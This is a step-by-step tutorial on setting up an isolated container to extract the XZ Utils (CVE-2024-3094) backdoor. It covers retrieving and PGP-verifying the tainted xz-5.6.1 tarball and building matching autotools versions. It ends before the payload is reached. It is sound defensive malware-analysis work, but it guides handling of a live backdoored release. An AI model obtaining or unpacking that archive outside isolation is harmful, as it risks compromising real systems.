Try   HackMD

How to extract the XZ backdoor malware payload

Documents reproducible step-by-step progress to safely extract the malware payload from the tainted XZ Utils release tarball.

https://hackmd.io/@cve-2024-3094/how-to-extract-the-malware-payload

Table of contents

Prerequisites

The following conditions must be met in order to run this tutorial:

  • A host machine has any of the virtualization solutions ready:
    • A container runtime(e.g. Docker Engine/Podman)
    • A virtual machine hypervisor(e.g. QEMU-KVM/Oracle Virtualbox/VMware Player or Workstation)
  • Internet access is available in the host machine.

In this tutorial the Docker container runtime is used, though other virtualization solutions may be used with minor modifications to the process.

Note that the command examples in the following sections assumes that you're using a Bash shell, you may need to translate it to the equivalent variants of your specific shell when running them.

Reproducible environment

The following are the environment that reproduces the tutorial during the writing process:

Host operating system

Ubuntu 24.04

Guest operating system (to actually do the extraction)

Ubuntu 22.04

Docker Engine

24.0.5

Launch a text terminal emulator application

Most of the following steps are required to be executed in a text terminal, launch your preferred text terminal emulator application to do so.

Create a working directory for this specific tutorial

To avoid accidental usage the tainted software, we should store all files that may be malicious in a specific folder (especially not your Downloads folder).

Use your preferred file manager application or run the following shell command to do so:

mkdir '/path/to/the/hosting/dir/CVE-2024-3094 vulnerability research'

Switch to the working directory

Run the following command to switch your working directory in order to minimize the keystroke required to refer files in that directory:

cd '/path/to/the/hosting/dir/CVE-2024-3094 vulnerability research'

Fetch the Ubuntu 22.04 Docker container image from the container registry.

To reduce the time required for the Update the container system to avoid zero-day exploits step during each tutorial reproduction session, fetch the latest Ubuntu 22.04 container image from the Docker registry by run the following command as root:

docker pull ubuntu:22.04

The command should have either one of the following similar output, depending on whether you already have the latest specified container image downloaded to your local host:

22.04: Pulling from library/ubuntu
062e51aa1fb4: Pull complete 
Digest: sha256:5cd569b792a8b7b483d90942381cd7e0b03f0a15520d6e23fb7a1464a25a71b1
Status: Downloaded newer image for ubuntu:22.04
docker.io/library/ubuntu:22.04
22.04: Pulling from library/ubuntu
Digest: sha256:77906da86b60585ce12215807090eb327e7386c8fafb5402369e421f44eff17e
Status: Image is up to date for ubuntu:22.04
docker.io/library/ubuntu:22.04

Note:

If you are in a networking environment where the Internet access is only available through a specific HTTP/HTTPS proxy service, you need to merge the following JSON dictionary keys and values with your Docker Daemon configuration file:

{
    "proxies": {
        "http-proxy": "_http_proxy_url_",
        "https-proxy": "_https_proxy_url_",
        "no-proxy": "*.local,127.0.0.0/8,192.168.0.0/16,10.0.0.0/8,172.16.0.0/12"
    }
}

and restart the Docker daemon to let the configuration change become effective. Refer the Configure Docker to use a proxy server | Docker Docs official documentation for more information.

Launch a Docker container to avoid accidentally compromising the system that used to inspect the malicious payload

Security implications:

It would even be safer if a virtual machine is created for this case, as the isolation of the guest and the host system is even better.

This is still isn't 100% safe though, given that virtual machine escape exploits still exist. Doing the work in another non-critical host machine with a likely malware-incompatible CPU architecture(like ARM or RISC-V) would be your best bet of safety.

Run the following commands as root to launch a ephemeral Docker container for the inspection of the malicious payload:

docker_run_opts=(
    # Destroy the container after exiting the run session
    --rm
    
    # Allows the interactive mode bash shell to properly run
    --interactive
    --tty
    
    # Mount the working directory under the /project directory
    # in the container for easy access to the tainted XZ Utils
    # files via the bind-mount Docker volume mechanism
    --mount "type=bind,source=${PWD},destination=/project"
    

    # Configure host-facing human-readable container name
    --name cve-2024-3094
    
    # Configure guest-facing human-readable container name
    # This is to prevent accidental out-of-scope usage of
    # this container, which should only be use in the scope
    # of this tutorial
    --hostname cve-2024-3094
    
    # Configure a custom DNS server instead of what the host is
    # currently using to avoid disclosing such info to the malware
    # 1.1.1.1 is a public DNS service hosted by Cloudflare
    --dns 1.1.1.1
)
docker run "${docker_run_opts[@]}" ubuntu:22.04

Note:

ansion syntax](https://www.gnu.org/software/bash/manual/html_node/Shell-Parameter-Expansion.html), which will be replaced by each of the double-quoted array members, separated by a space character after expansion. You can prepend the echo command before the command containing such notion(e.g. echo "${array[@]}") to preview the expanded result.

Note:

If you're in an network environment where Internet access is only available through an HTTP/HTTPS proxy, run the following commands before the invocation of the docker run command:

  • docker_run_opts+=(--env http_proxy=__HTTP_PROXY_URL__)
  • docker_run_opts+=(--env https_proxy=__HTTPS_PROXY_URL__)

You may omit part of the argument of the --env docker run command-line option after the equal sign(not including the trailing closing parenthesis) if you already have the environment variables set in you host machine.

Note:

By default the Ubuntu container image has the timezone set to the Coordinated Universal Time(UTC), if you're in a different timezone you can run the following command to fix the timezone settings:

docker_run_opts+=(--env TZ=_std__offset_)

Replace the std placeholder of the TZ environment variable's value to a suitable time zone abbreviation, refer List of time zone abbreviations - Wikipedia for the full list of them or simply use LOC as it doesn't really used other than displaying such abbreviation to the user so it doesn't really matter much.

Replace the offset placeholder of the TZ environment variable's value to the time value you must add to the local time to get a UTC time. It has a [+|-]hh[:mm[:ss]] format where the square bracket pair denotes optional field and the pipe(|) character denotes possible alternations, and for the hh, mm, and ss fields leading zeros can also be omitted.

For example for users in Taiwan(UTC+8) a proper TZ value would be CST-8, as the time zone abbreviation is CST and minus 8 hours must be applied to the local time to get the UTC time.

Security implications:

You may not need to run the docker run command as root if you've set the proper permission to access the Docker daemon control socket, however, this setup also has security implications that need to be taken care of.

Warning:

It is recommended to access all data from the potentially evil actor from within the container/virtual machine's isolation from this point as such data may contain malicious logic that may compromise your host system.

(Optional) Switch to use a local Ubuntu software repository mirror service

By default the Ubuntu docker container image has the archive.ubuntu.com software archive URL configured in the APT software package management system software sources list, however the servers of this address are located in England and United States(according to the ip address-geolocation lookup results):

$ dig +short archive.ubuntu.com @1.1.1.1
91.189.91.83
91.189.91.82
185.125.190.36
91.189.91.81
185.125.190.39

IP address-geolocation lookup result for the "91.189.91.81" IP address, indicate that the server is likely in United States

IP address-geolocation lookup result for the "185.125.190.36" IP address, indicate that the server is likely in England

and thus the package download speed will be limited if you don't live in one of these regions.

To fix this problem we can switch to your local country representative mirror service (using the country_code.archive.ubuntu.com domain, where country_code is a ISO 3166-1 alpha-2 code) or one of your local regular mirror services of the Ubuntu software repository archives by running the following commands as root:

read_opts=(
    # Specify input prompt to present to the user
    -p 'Input the domain name of your local Ubuntu software archive mirror service: '
    
    # Don't allow backslash sequences in the input data to be
    # interpreted
    -r
)
read "${read_opts[@]}" archive_mirror_domain

# FIXME: The domain name validation regex is not rigorous assuming that
# an domain like 你好.世界 exists(which it does)
regex_domain_name='^.+\..+$'
if ! [[ "${archive_mirror_domain}" =~ ${regex_domain_name} ]]; then
    printf \
        'Error: The specified domain name is invalid.\n.' \
        1>&2
else
    now_timestamp="$(date +%Y%m%d-%H%M%S)"
    sed_opts=(
        # Modify the content of the input file in-place, which creating a
        # backup file in order to revert the changes without hassle.
        --in-place=".orig.${now_timestamp}"

        # Use extended regular expression(E.R.E.) as it is more robust than
        # the default basic regular expression(B.R.E.) variant
        --regexp-extended

        # Apply the sed expression to replace the default software
        # repository domain to your local regions's ubuntu software archive
        # mirror domain:
        # Replace every string that matches the `//[^/]*/ubuntu/` regular
        # expression to `//${archive_mirror_domain}/ubuntu/`
        --expression="s@//[^/]*/ubuntu/@//${archive_mirror_domain}/ubuntu/@"
    )
    sed "${sed_opts[@]}" /etc/apt/sources.list
fi

As the software sources are modified we need to refresh the APT software package management system's local cache the make the modification effective, run the following command as root should do so:

apt update

Update the container system to avoid zero-day exploits

As the release archive to inspect is potentially dangerous, we should fully update our container system to reduce the possibility that a 0day exploit may be used to compromise our container system (and in turn, our working host system).

Run the following command as root to achieve so:

apt full-upgrade

Security implication:

Note that the currently running container process(the Bash shell you're pasting commands to) is still unpatched and may still be exploited by the attacker, to mitigate this risk launch a subshell by running the following command:

bash

If you want to avoid the mitigation please avoid source-ing or .-ing any scripts or non-script files in the project.

Change the working directory to the in-container working directory

Run the following command to change the working directory to the bind-mounted working directory:

cd /project

Retrieve the tainted upstream release archives

The upstream release archives are not accessible right now as GitHub disabled the access to the upstream project Git repository.

Screenshot of the "This repository has been disabled." error page of the upstream GitHub repository

Fortunately, with the help of the Wayback Machine and some other third-party backups we are still able to retrieve them as well as the PGP signature that can be used to verify its authenticity (to the extent of an incomplete PGP web of trust).

You may locate the files in the Wayback Machine search results page for the https://github.com/tukaani-project/xz/releases/download/* URLs, and some, other, sources, or simply download the files from the following currated list using your preferred web browser application:

Note:

  • We specifically choose NOT to use the non-XZ-compressed archive format variants of the XZ Utils release archives as the evil actor definitely has a deeper understanding to the XZ compression format, to an extent they(in a highly unlikely circumstances) may have crafted the release archive in a way that it may trigger an unknown vulerability when one tries to extract them.
  • Choose the earliest archived version in the Wayback Machine snapshot selection interface(the calendar view) as future versions may not be the original.

Verify the authenticity of the tainted XZ Utils release archive

As the XZ Utils release archives fetched from the Wayback Machine and other backup sources doesn't necessary be unmodified or even released by the evil actor themselves, we must verify their authenticity.

We can achieve so by using the Pretty Good Privacy(PGP) public key of the evil actor as well as the PGP signature files distributed along with the release archives.

Install the runtime dependencies required for verifying a PGP-signed document

First, we need to install the software required for verifying PGP-signed documents, The GNU Privacy Guard(GnuPG) is the one that is mainly used on a GNU+Linux operating system, let's install it by running the following command as root:

apt install gnupg

Fetch a copy of the potential evil actor's PGP public key

We also need to have a copy of the PGP public key of the evil actor, which can be obtained from the Wayback Machine.

Simply copy the entire -----*PUBLIC KEY BLOCK-----(including the beginning and ending marker lines) and save the content to the "potential-evil-actor.pubkey" new file in the working directory using a plaintext editor should suffice.

Import the evil actor's PGP public key to the GnuPG keyring

To verify documents signed with PGP we must first import the evil actor's PGP public key to the GnuPG keyring, run the following command will do so:

gpg_opts=(
    # Import the specified PGP public key into your default keyring
    --import
)
gpg "${gpg_opts[@]}" potential-evil-actor.pubkey

The following output should be displayed:

gpg: key 59FCF207FEA7F445: 1 signature not checked due to a missing key
gpg: /root/.gnupg/trustdb.gpg: trustdb created
gpg: key 59FCF207FEA7F445: public key "Jia Tan <jiat0218@gmail.com>" imported
gpg: Total number processed: 1
gpg:               imported: 1
gpg: no ultimately trusted keys found

Note:

  • The gpg: key 59FCF207FEA7F445: 1 signature not checked due to a missing key warning message is due to the fact that the public key of the unknown person that signed the evil actor's PGP keypair is not in your keychain, which is an expected result as the keychain does not exist in the first place.
  • The gpg: no ultimately trusted keys found warning message is due to the fact that the PGP web of trust is missing for this particular public key, which is expected as the web of trust requires that you have your own private/public key pair and has signed(trusted) either the evil actor's keypair, or other people's keypairs who (directly or indirectly) have signed the evil actor's keypair, which does not exist in the first place. How to satisfy such trust model to get rid of the warning, however, is out of the scope of this tutorial.

Verify the authenticity of the PGP-signed XZ Utils release archive

Run the following command to verify the release archive's authenticity:

gpg_opts=(
    # Verify the authenticity of the xz-5.6.1.tar.bz2 file using the
    # detached PGP signature file xz-5.6.1.tar.bz2.sig(and the signer's
    # PGP public key in your keyring)
    --verify xz-5.6.1.tar.bz2.sig xz-5.6.1.tar.bz2
)
gpg "${gpg_opts[@]}"

The following output should be displayed:

gpg: Signature made Sat Mar  9 08:22:45 2024 UTC
gpg:                using RSA key 22D465F2B4C173803B20C6DE59FCF207FEA7F445
gpg: Good signature from "Jia Tan <jiat0218@gmail.com>" [unknown]
gpg: WARNING: This key is not certified with a trusted signature!
gpg:          There is no indication that the signature belongs to the owner.
Primary key fingerprint: 22D4 65F2 B4C1 7380 3B20  C6DE 59FC F207 FEA7 F445

Note:

  • The gpg: Good signature from "_display_name_ <_email_address_>..." output indicates that the PGP-signed file is successfully verified. The [unknown] part at the end of such line indicates that the trustworthyness of the keypair that signed the file is determined to be "unknown" according to the the PGP web of trust.
  • The WARNING: This key is not certified with a trusted signature! There is no indication that the signature belongs to the owner. warning message is due to the fact that the PGP web of trust is missing for the evil actor's public key, refer the gpg: no ultimately trusted keys found warning message note above for more info.

Now we know that the release archive is indeed signed by the potential evil actor, the result of the further extraction process should be reproducible by everyone as long as they also retrieves the same file.

Installing softwares that are needed for extracting the tainted XZ Utils release archive

Now we shall extract the tainted XZ Utils release archive, according to the .tar.bz2 filename extension the release archive is a bzip-compressed tarball, you can run the following command as root to install software that is needed for extracting such files:

bzip_tarball_extraction_dependency_pkgs=(
    # For uncompressing the bzip2 compressed file
    bzip2
    
    # For extracting the plain tar archive file
    tar
)
apt install "${bzip_tarball_extraction_dependency_pkgs[@]}"

Extract the tainted the XZ Utils release archive

Run the following command to extract the XZ Utils release archive:

tar_opts=(
    # Specify to uncompress and extract the specified archive
    --extract
    --file xz-5.6.1.tar.bz2
)
tar "${tar_opts[@]}"

Note:

It is recommended to use in-container utilities to inspect the files from the potential evil actor as you may unintentionally run the programs inside of it(by the GUI double-click mechanism) or have your system compromised due to a vulnerability of one of your host system's components being exploited.

Clone the upstream project's Git repository to the localhost

We can rebuild the unmodified aforementioned build system files from the source tree checked-out from the upstream Git repository to compare what actually did the evil actor do to the files.

The firt step would be to install the Git version control system software, you can run the following command as root to do so:

apt install git

then run the following command to clone the upstream Git repository to the local host and check-out the 5.6.1 version from it:

git_clone_opts=(
    # Limit the history to fetch only 1 commit of history to reserve
    # storage space, internet data usage, and fetch time
    --depth=1
    
    # Checkout the v5.6.1 tag only
    --branch v5.6.1
)
git clone "${git_clone_opts[@]}" \
    https://git.tukaani.org/xz.git \
    xz-git

Let's change the working directory back to initial one, as we no longer need to perform Git operations:

cd /project

Read the XZ Utils installation document

Now we can read the Installation document(INSTALL) in the XZ Utils source tree, however we need a pager utility to do so. As the pager utility available in the Ubuntu container by default is more which is limited in browsing features(e.g. page up), let's install the much capable less pager by running the following command as root:

apt install less

Security implication:

Never use the cat command to read a file, the file may contain escape code that may be interpreted by your terminal, which may have unintended or even malicious results. Using a pager utility(e.g. less) to mitigate such risks.

Then we can read the installation document in the XZ Utils source tree by running the following command:

less xz-git/INSTALL

Note:

Press the q key on your keyboard to leave the less pager program.

Determine the software used to generate the build system files

According to the Preface section of the XZ Utils installation document, XZ Utils uses the GNU build system to build the software, which may include the following (including, but not limited to) software components:

  • GNU Autoconf
    For automatically generating a build configuration program suitable for usage in many processor architectures and operating systems.
  • GNU Automake
    A tool for automatically generating Makefile.in files compliant with the GNU Coding Standards.
  • GNU Libtool
    For hiding the complexity of using shared libraries behind a consistent, portable interface.

(The XZ Utils software also implements the CMake build system as an alternative build system, however, since the malware injection is not made into that portion it is out of scope of this tutorial).

It would be more helpful if we build the build system files using the exact same version of software that the evil actor do as it will introduce less noise during the content comparison operation(to figure out what actually the evil actor do to inject the malicious code).

We can determine the version of the GNU Autoconf build tool used by the software(assuming that it is not obfuscated by the evil actor), by checking the heading comment of the build configuration program of the released source code by running the following command:

head_opts=(
    # Only show 3 lines instead of the default 10
    --lines=3
)
head "${head_opts[@]}" xz-5.6.1/configure

which should have the following output, indicate that the Autotool version used for building the build files is likely 2.72:

#! /bin/sh
# Guess values for system-dependent variables and create Makefiles.
# Generated by GNU Autoconf 2.72 for XZ Utils 5.6.1.

We can determine the version of the GNU Automake build tool used by the software(assuming that it is not obfuscated by the evil actor), by checking the heading comment of the Makefile input file of the released source code by running the following command:

head_opts=(
    # Only show 3 lines instead of the default 10
    --lines=3
)
head "${head_opts[@]}" xz-5.6.1/Makefile.in

which should have the following output, indicate that the Automake version used for building the build files is likely 1.16.5:

# Makefile.in generated by automake 1.16.5 from Makefile.am.
# @configure_input@

We can determine the version of GNU Libtool used by the software (assuming that it is not obfuscated by the evil actor), by checking the heading comment of the build-aux/ltmain.sh file of the released source code by running the following command:

head_opts=(
    # Only show 5 lines instead of the default 10
    --lines=5
)
head "${head_opts[@]}" xz-5.6.1/build-aux/ltmain.sh

which should have the following output, indicate that the GNU Libtool version used for building the build files is likely a modified version of 2.4.7.4(with the revision fingerprint 1ec8f):

#! /usr/bin/env sh
## DO NOT EDIT - This file generated from ./build-aux/ltmain.in
##               by inline-source v2019-02-19.15

# libtool (GNU libtool) 2.4.7.4-1ec8f-dirty

After checking the revision history of the GNU libtool project you can realize the actual version of it is the fourth revision beyond 2.4.7 version tag(as the commit hash(1ec8f) matches). The -dirty version string suffix indicate that the libtool source may have additional unknown changes that deviate it from the 1ec8f revision.

Upon inspection of the configure.ac GNU Autoconf input file we can notice that the XZ Utils software also make uses the GNU Gettext internationalication(I18N) support library:

dnl Support for _REQUIRE_VERSION was added in gettext 0.19.6. If both
dnl _REQUIRE_VERSION and _VERSION are present, the _VERSION is ignored.
dnl We use both for compatibility with other programs in the Autotools family.
echo
echo "Initializing gettext:"
AM_GNU_GETTEXT_REQUIRE_VERSION([0.19.6])
AM_GNU_GETTEXT_VERSION([0.19.6])
AM_GNU_GETTEXT([external])

As GNU Gettext will also generate build system files to the source tree, we must build the exact same GNU Gettext version the potential evil actor used as well, which can be found via inspecting the header of the xz-5.6.1/m4/gettext.m4 file by running the following commands:

head_opts=(
    # Only show 1 lines instead of the default 10
    --lines=1
)
head "${head_opts[@]}" xz-5.6.1/m4/gettext.m4

, according to the following output, the GNU Gettext version used to build the 5.6.1 XZ Utils seems to be 0.22.4:

# gettext.m4 serial 78 (gettext-0.22.4)

Install the software dependencies to generate the build system files

While the Ubuntu software distribution may provide these software with the required versions, they may also introduces additional changes on their own that will complicate the difference comparison process, so we'll have to build and install these softwares from the source code manually.

GNU Autoconf

The installation of the GNU Autoconf software can be done by following the Downloading Autoconf section of the Autoconf project page to locate the download URLs of the 2.72 release archive and its respective PGP signature file and download them to the working directory using your web browser.

Then, as usual, verify that the release archive we've downloaded are actually made by the Autotools project maintainer. We can determine who actually signed the release archive by running the following command:

gpg_opts=(
    # Verify the authenticity of the autoconf-2.72.tar.xz file using the
    # detached PGP signature file autoconf-2.72.tar.xz.sig(and the
    # signer's PGP public key in your keyring which does not exist at
    # the moment)
    --verify autoconf-2.72.tar.xz.sig autoconf-2.72.tar.xz
)
gpg "${gpg_opts[@]}"

You should see the following error message from GnuPG:

gpg: Signature made Fri Dec 22 19:13:21 2023 UTC
gpg:                using RSA key 82F854F3CE73174B8B63174091FCC32B6769AA64
gpg: Can't check signature: No public key

The PGP signature can't be checked as we don't have the signer's public key in our PGP keyring, we can retrieve the public key using the key's ID(82F854F3CE73174B8B63174091FCC32B6769AA64) from the previous output by running the following command:

gpg_opts=(
    # Specify the keyserver to fetch the public key from.
    # 
    # GnuPG does have one set by Debian(hkps://keys.openpgp.org),
    # , however, it doesn't work reliably during the writing of this
    # tutorial thus the other popular one is used instead.
    --keyserver keyserver.ubuntu.com
    
    # Import the keys with the given keyIDs from a keyserver
    --receive-keys 0x82F854F3CE73174B8B63174091FCC32B6769AA64
)
gpg "${gpg_opts[@]}"

You should see the following command output:

gpg: key 91FCC32B6769AA64: public key "Zack Weinberg <zackw@panix.com>" imported
gpg: Total number processed: 1
gpg:               imported: 1

which indicates that the one who signed the release is supposed to be Zack Weinberg <zackw@panix.com>. According to the Maintainers section of the Autoconf project page the project maintainer seems to be:

which is wierd as Zack isn't in the list. However, from checking the summary page of the Autoconf's Git repository we can verify that it is indeed Zack Weinberg that prepares the 2.72 release:

The screenshot of the recent commits of the GNU Autoconf source repository, "Zack Weinberg" is listed to be the author that written the "Finalize NEWS for release 2.72." revision(outlined in red)

We can now proceed to verify the released GNU Autoconf source archive:

gpg_opts=(
    # Verify the authenticity of the autoconf-2.72.tar.xz file using the
    # detached PGP signature file autoconf-2.72.tar.xz.sig(and the
    # signer's PGP public key in your keyring)
    --verify autoconf-2.72.tar.xz.sig autoconf-2.72.tar.xz
)
gpg "${gpg_opts[@]}"

Note:

As mentioned in the Verify the authenticity of the tainted XZ Utils release archive section, the following output line indicate that the PGP-signed file is verified successfully:

gpg: Good signature from "DISPLAY NAME <EMAIL-ADDRESS>" [*]

We can now proceed to extract the Autoconf source archive, but first we need to install the (hopefully not malicious :P) XZ Utils software required to do so, run the following command as root:

xz_tarball_uncompress_dependency_pkgs=(
    xz-utils
)
apt install "${xz_tarball_uncompress_dependency_pkgs[@]}"

Then run the following command to extract the Autoconf source archive:

tar_opts=(
    # Specify to uncompress and extract the specified archive
    --extract
    --file autoconf-2.72.tar.xz
)
tar "${tar_opts[@]}"

Now we can try building the Autoconf from source. As the build configuration program(autoconf-2.72/configure) will create build files in your working directory let's switch the working directory to the autoconf source directory to avoid writing files outside of it:

cd autoconf-2.72

Then we can iteratively run the build configuration program to satisfy the build requirement and finally, generate the Makefile to actually build and install the software. Run the following command to do so:

./configure

The Autoconf's build configuration program prints the following error message, which indicates that it require the GNU M4 software to be installed:

configure: error: no acceptable m4 could be found in $PATH.
GNU M4 1.4.8 or later is required; 1.4.16 or newer is recommended.
GNU M4 1.4.15 uses a buggy replacement strstr on some systems.
Glibc 2.9 - 2.12 and GNU M4 1.4.11 - 1.4.15 have another strstr bug.

We can install it by running the following command as root:

apt install m4

Now we can run the build configuration program again:

./configure

If you see the following output and that the Makefile file appears in the source tree, it means that the build configuration of the GNU Autoconf software has finished successfully:

configure: creating ./config.status
config.status: creating tests/atlocal
config.status: creating Makefile
config.status: creating lib/version.m4
config.status: executing tests/atconfig commands

You are about to use an experimental version of Autoconf.  Be sure to
read the relevant mailing lists, most importantly <autoconf@gnu.org>.

Below you will find information on the status of this version of Autoconf.

    ...stripped...

We need the GNU Make software to read the Makefile to build the GNU Autoconf software, run the following command as root to do so:

apt install make

Now we can start building the GNU Autoconf software by running the following command:

number_of_cpu_threads="$(nproc)"
make_opts=(
    # Speed-up the build process by using multiple process at the same
    # time
    --jobs="${number_of_cpu_threads}"
)
make "${make_opts[@]}"

Note:

if the command's exit status code is zero it means that the build is successful. Run the following command right after the make command's invocation to verify this:

echo "${?}"

Then run the following command to install the built GNU Autoconf software to the system:

make install

After the installation of the GNU Autoconf software you should have the autoconf command in your command search PATHs(/usr/local/bin to be specific). You may check the version of the installation by running the following command:

autoconf --version

Let's run the following command to switch the working directory back to the initial one as we have no business to do with the Autoconf source tree anymore:

cd /project

GNU Automake

The installation of the GNU Automake software can be started by locating the download URL of the 1.16.5 release archive and its respective PGP signature file and download them to the working directory using your web browser.

Then, as usual, verify that the release archive we downloaded are actually made by the GNU Automake project maintainer. We can determine who have actually signed the release archive by running the following command:

gpg_opts=(
    # Verify the authenticity of the automake-1.16.5.tar.xz file using
    # the detached PGP signature file automake-1.16.5.tar.xz.sig(and the
    # signer's PGP public key in your keyring which does not exist at
    # the moment)
    --verify automake-1.16.5.tar.xz.sig automake-1.16.5.tar.xz
)
gpg "${gpg_opts[@]}"

You should see the following error message from GnuPG:

gpg: Signature made Mon Oct  4 03:23:30 2021 UTC
gpg:                using RSA key 155D3FC500C834486D1EEA677FD9FCCB000BEEEE
gpg: Can't check signature: No public key

The PGP signature can't be checked as we don't have the signer's public key in our PGP keyring, we can retrieve the public key using the key's ID from the previous output by running the following command:

gpg_opts=(
    # Specify the keyserver to fetch the public key from.
    # 
    # GnuPG does have one set by Debian(hkps://keys.openpgp.org),
    # , however, it doesn't work reliably during the writing of this
    # tutorial thus the other popular one is used instead.
    --keyserver keyserver.ubuntu.com
    
    # Import the keys with the given keyIDs from a keyserver
    --receive-keys 0x155D3FC500C834486D1EEA677FD9FCCB000BEEEE
)
gpg "${gpg_opts[@]}"

It should have the following output:

gpg: key 7FD9FCCB000BEEEE: public key "Jim Meyering <jim@meyering.net>" imported
gpg: Total number processed: 1
gpg:               imported: 1

Note:

If you still can't successfully retrieve the public key it might be the connection has been blocked by your network's firewall, you could also try using the hkp://keyserver.ubuntu.com:80 keyserver which should get through the hostile networking environment.

As shown by the GNU Automake project page, Jim Meyering is indeed the one who released the packages, so the public key we've fetched here is probably legit:

Screenshot of the "Latest News" section of the GNU Automake project page, meyering(Jim Meyering) can be found in the post author information (outlined in red)

We can now proceed to verify the 1.16.5 GNU Automake source archive:

gpg_opts=(
    # Verify the authenticity of the automake-1.16.5.tar.xz file using
    # the detached PGP signature file automake-1.16.5.tar.xz.sig(and the
    # signer's PGP public key in your keyring)
    --verify automake-1.16.5.tar.xz.sig automake-1.16.5.tar.xz
)
gpg "${gpg_opts[@]}"

Note:

As mentioned in the Verify the authenticity of the tainted XZ Utils release archive section, the following output line indicate that the PGP-signed file is verified successfully:

gpg: Good signature from "DISPLAY NAME <EMAIL-ADDRESS>" [*]

We can now proceed to extract the GNU Automake source archive, run the following command to do so:

tar_opts=(
    # Specify to uncompress and extract the specified archive
    --extract
    --file automake-1.16.5.tar.xz
)
tar "${tar_opts[@]}"

Now we can try building the Automake from source. As the build configuration program(automake-1.16.5/configure) will create build files in your working directory let's switch the working directory into the GNU Autoconf 1.16.5 source directory to avoid writing files outside of it:

cd automake-1.16.5

Then we can iteratively run the build configuration program to satify the build requirement and finally, generate the Makefile to actually build and install the software. Run the following command to do so:

./configure

If you see the following output, the build configuration should be completed without errors:

configure: creating ./config.status
config.status: creating Makefile
config.status: creating pre-inst-env

Note:

The build configuration program does printed some warning messages, however all of them seemed to only affect with the automated software testing of the GNU Automake software which we doesn't really need in this tutorial so let's let them slide.

Now we can start building the GNU Automake software by running the following command:

number_of_cpu_threads="$(nproc)"
make_opts=(
    # Speed-up the build process by using multiple process at the same
    # time
    --jobs="${number_of_cpu_threads}"
)
make "${make_opts[@]}"

if the command's exit status code is zero it means that the build is successful. Run the following command right after the make command's invocation to verify this:

echo "${?}"

Then run the following command to install the built GNU Automake software to the system:

make install

After the installation of the GNU Automake software you should have the automake command in your command search PATHs(/usr/local/bin). You may check the version of the installation by running the following command:

automake --version

Let's turn our heads back to the initial working directory as we have no longer have business to do with the Automake source tree anymore:

cd /project

GNU Libtool

The installation of the GNU Libtool software can be started by locating the download URL of the 2.4.7.4 release archiveuntil you noticed that there's no such release version called 2.4.7.4:

The Downloads section of the GNU Libtool home page shows that the latest released version is "2.4.7"

The release package download website shows that the version of the latest release tarballs is also "2.4.7"

According to the full version string 2.4.7.4-1ec8f-dirty we found earlier, it appears that the .4 part of the GNU Libtool version string indicates the development revision that has deviated from the 2.4.7 release by 4 revisions and has the revision fingerprint 1ec8f. By searching the revisions committed to the repository after the 2.4.7 release and matching the revision fingerprints we can found that the GNU Libtool software that created the build system files seems to be based on the "libtool: passthru '-Werror' flags" revision.

We can fetch the GNU Libtool source tree of this specific revision from the upstream Git repository URL listed in the Clone section of the libtool.git Git repository summary page by running the following commands:

git_clone_opts=(
    # Specify history fetch depth to 200 revisions from the default
    # branch's tip revision
    --depth=200
)
git clone "${git_clone_opts[@]}" \
    https://git.savannah.gnu.org/git/libtool.git \
    libtool-git
cd libtool-git
git checkout 1ec8fa2

Note:

If the following output is printed during the git checkout command, it indicates that your history fetch depth is too shallow:

error: pathspec '1ec8fa2' did not match any file(s) known to git

you can retry the operation after deepening the history fetch depth by running the following command after switching your working directory to the libtool-git directory:

git_fetch_opts=(
    # Specify history fetch depth to _more_revision_quantities_
    # revisions from the default branch's tip revision
    --depth=_more_revision_quantities_
)
git fetch "${git_fetch_opts[@]}"

Now we can try building the GNU Libtool from source. Unfortunately, the INSTALL installation documentation doesn't exist in the source tree and in the URL instructed in the GNU Libtool 1ec8fa2 revision README:

Screenshot of the portion of the 18c8fa2 revision GNU Libtool README document that mentions the INSTALL installation document(highlighted in yellow) and it's on-website URL(outlined in red)

Screenshot of page of the supposedly-to-be the on-website GNU Libtool INSTALL document, which is an error message claiming "Path not found"

As a fallback option we refer to the current revision of the GNU Libtool README documentation, which now references the existing INSTALL installation document of the GNU Automake software instead:

A screenshot of the INSTALL document URL referenced by the current GNU Libtool software README document

As the source build bootstrapping program(libtool-git/bootstrap) expects it to be run when your working directory is under the source tree be sure to change the working directory if you haven't done in the previous step by running the following command:

cd /project/libtool-git

Then run the source build bootstrpping program by running the following command:

test -f configure || ./bootstrap

which should print the following error messages, indicate that we haven't satisfy their source build bootstrpping prerequisites:

bootstrap:   error: Prerequisite 'help2man' not found. Please install it, or
bootstrap:          'export HELP2MAN=/path/to/help2man'.
bootstrap:   error: Prerequisite 'makeinfo' not found. Please install it, or
bootstrap:          'export MAKEINFO=/path/to/makeinfo'.

To install the help2man prerequisite, we can run the following command to search the APT software package management system:

apt search help2man

, which reveals that there's a package that can be installed:

Sorting... Done
Full Text Search... Done
help2man/jammy 1.49.1 amd64
  Automatic manpage generator

However this isn't the case for the makeinfo prerequisite:

root@cve-2024-3094:/project/libtool-git# apt search makeinfo
Sorting... Done
Full Text Search... Done
root@cve-2024-3094:/project/libtool-git#

Fortunately, we can locate which package provide this prerequisite by using the apt-file utility. First, install the utility by running the following command as root:

apt install apt-file

then, run the following command as root to fetch the metadata required by apt-file's operation:

apt-file update

We can then query the packages that provides the makeinfo utility by running the following command:

apt_file_search_opts=(
    # Specify that the search pattern is a regular expression instead
    # of a glob pattern
    --regexp
)
apt-file search "${apt_file_search_opts[@]}"  '/s?bin/makeinfo$'

According to the following apt-file command's output, we can confirm that the textinfo package provides the makeinfo command:

texinfo: /usr/bin/makeinfo

Note:

We can also use the Ubuntu Packages Search website to query the package that provides the specific file.

We can now run the following command as root to install all the missing packages:

libtool_bootstrap_prerequisite_pkgs=(
    help2man
    texinfo
)
apt install "${libtool_bootstrap_prerequisite_pkgs[@]}"

We can now retry the source build bootstrpping program by running the following command:

test -f configure || ./bootstrap

If you see the following output then the bootstrapping process has completed successfully:

bootstrap: Done.  Now you can run './configure'.

Note:

If you're in an networking environment where the Internet access is only available via an HTTP proxy, the source build bootstrapping program will print the following error:

Cloning into 'gnulib'...
fatal: unable to look up git.savannah.gnu.org (port 9418) (Temporary failure in name resolution)

You can run the following command to patch the gnulib submodule's repository address to workaround the problem:

current_timestamp="$(date +%Y%m%d-%H%M%S)"
sed_opts=(
    # Modify the input file in-place, while saving a backup file with
    # the current timestamp while doing so
    --in-place=".orig.${current_timestamp}"
)
sed \
    "${sed_opts[@]}" \
    's@git://git.savannah.gnu.org/gnulib.git@https://git.savannah.gnu.org/git/gnulib.git@g' \
    .gitmodules

